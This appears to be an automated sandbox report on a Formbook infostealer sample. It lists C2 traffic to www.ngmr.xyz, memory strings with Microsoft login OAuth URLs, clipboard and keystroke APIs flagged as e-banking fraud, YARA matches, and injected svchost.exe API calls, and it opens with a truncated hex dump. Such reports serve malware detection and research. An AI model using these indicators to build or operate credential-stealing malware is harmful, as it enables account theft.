20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 
69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:31 GMTX-Varnish: 1252442322Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:34 GMTX-Varnish: 1252442352Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:36 GMTX-Varnish: 1252442382Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=iso-8859-1Content-Length: 282Accept-Ranges: bytesDate: Thu, 05 Dec 2024 17:46:40 GMTX-Varnish: 1252442421Age: 0Via: 1.1 varnishConnection: closeX-Varnish-Cache: MISSServer: C2M Server v1.02Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /qj8y/ was not found on this server.</p><hr><address>Apache/2.4.7 (Ubuntu) Server at www.ngmr.xyz Port 8080</address></body></html>
            Source: WNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz
            Source: WNGaDiurNI.exe, 00000008.00000002.2717205821.0000000001048000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ngmr.xyz/qj8y/
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
            Source: clip.exe, 00000007.00000003.2149406438.0000000007BD4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
            Source: clip.exe, 00000007.00000002.2715641135.0000000002F90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
            Source: clip.exe, 00000007.00000002.2723594633.0000000007BFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00856B0C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856D07 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00856D07
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00856B0C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00856B0C
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00842B37 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00842B37
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086F7FF DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0086F7FF

            E-Banking Fraud

            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: This is a third-party compiled AutoIt script.0_2_00803D19
            Source: s7Okni1gfE.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: s7Okni1gfE.exe, 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_772e0d31-6
            Source: s7Okni1gfE.exe, 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_4d20a6fb-2
            Source: s7Okni1gfE.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_e567c987-5
            Source: s7Okni1gfE.exeString found in binary or memory: CSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1e51bef4-0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C0F3 NtClose,2_2_0042C0F3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B60 NtClose,LdrInitializeThunk,2_2_03072B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03072DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C70 NtFreeVirtualMemory,LdrInitializeThunk,2_2_03072C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030735C0 NtCreateMutant,LdrInitializeThunk,2_2_030735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074340 NtSetContextThread,2_2_03074340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03074650 NtSuspendThread,2_2_03074650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072B80 NtQueryInformationFile,2_2_03072B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BA0 NtEnumerateValueKey,2_2_03072BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BE0 NtQueryValueKey,2_2_03072BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072BF0 NtAllocateVirtualMemory,2_2_03072BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AB0 NtWaitForSingleObject,2_2_03072AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AD0 NtReadFile,2_2_03072AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072AF0 NtWriteFile,2_2_03072AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F30 NtCreateSection,2_2_03072F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F60 NtCreateProcessEx,2_2_03072F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072F90 NtProtectVirtualMemory,2_2_03072F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FA0 NtQuerySection,2_2_03072FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FB0 NtResumeThread,2_2_03072FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072FE0 NtCreateFile,2_2_03072FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E30 NtWriteVirtualMemory,2_2_03072E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072E80 NtReadVirtualMemory,2_2_03072E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EA0 NtAdjustPrivilegesToken,2_2_03072EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072EE0 NtQueueApcThread,2_2_03072EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D00 NtSetInformationFile,2_2_03072D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D10 NtMapViewOfSection,2_2_03072D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072D30 NtUnmapViewOfSection,2_2_03072D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DB0 NtEnumerateKey,2_2_03072DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072DD0 NtDelayExecution,2_2_03072DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C00 NtQueryInformationProcess,2_2_03072C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072C60 NtCreateKey,2_2_03072C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CA0 NtQueryInformationToken,2_2_03072CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CC0 NtQueryVirtualMemory,2_2_03072CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03072CF0 NtOpenProcess,2_2_03072CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073010 NtOpenDirectoryObject,2_2_03073010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073090 NtSetValueKey,2_2_03073090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_030739B0 NtGetContextThread,2_2_030739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D10 NtOpenProcessToken,2_2_03073D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03073D70 NtOpenThread,2_2_03073D70
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00846685: CreateFileW,DeviceIoControl,CloseHandle,0_2_00846685
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083ACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_0083ACC5
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008479D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_008479D3
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082B0430_2_0082B043
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008132000_2_00813200
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083410F0_2_0083410F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008202A40_2_008202A4
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083038E0_2_0083038E
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0080E3B00_2_0080E3B0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008206D90_2_008206D9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083467F0_2_0083467F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086AACE0_2_0086AACE
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00834BEF0_2_00834BEF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082CCC10_2_0082CCC1
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00806F070_2_00806F07
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0080AF500_2_0080AF50
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008631BC0_2_008631BC
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082D1B90_2_0082D1B9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081B11F0_2_0081B11F
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0082123A0_2_0082123A
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0083724D0_2_0083724D
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008413CA0_2_008413CA
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008093F00_2_008093F0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081F5630_2_0081F563
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008096C00_2_008096C0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0084B6CC0_2_0084B6CC
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008077B00_2_008077B0
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0086F7FF0_2_0086F7FF
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_008379C90_2_008379C9
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_0081FA570_2_0081FA57
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00809B600_2_00809B60
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00813B700_2_00813B70
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00807D190_2_00807D19
            Source: C:\Users\user\Desktop\s7Okni1gfE.exeCode function: 0_2_00829ED00_2_00829ED0
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0081FE6F
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00807FA3
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_011B4120
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00418143
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00403040
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004010F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004021DD
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004021E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040F9B3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401260
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00416323
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040FBD3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DBF4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040238C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402390
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040DC53
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_004026C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0042E723
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FA352
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304E3F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031003E6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E0274
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C02C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030100
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DA118
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030C8158
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F41A2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031001AA
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F81CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D2000
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03064750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303C7C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305C6E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040535
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03100591
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E4420
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F2446
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EE4F6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FAB40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F6BD7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310A9A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304A840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030268B8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0306E8F0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03082F28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03060F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E2F30
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B4F40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030BEFA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03032FC8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304CFE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEE26
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040E59
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03052E90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FCE93
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FEEDB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304AD00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DCD1F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03058DBF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0303ADE0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03040C00
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E0CB5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03030CF2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F132D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302D34C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0308739A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030452A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B2C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E12ED
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307516C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0302F172
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0310B16B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0304B1B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EF0CC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F70E9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF0E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF7B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085630
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F16CC
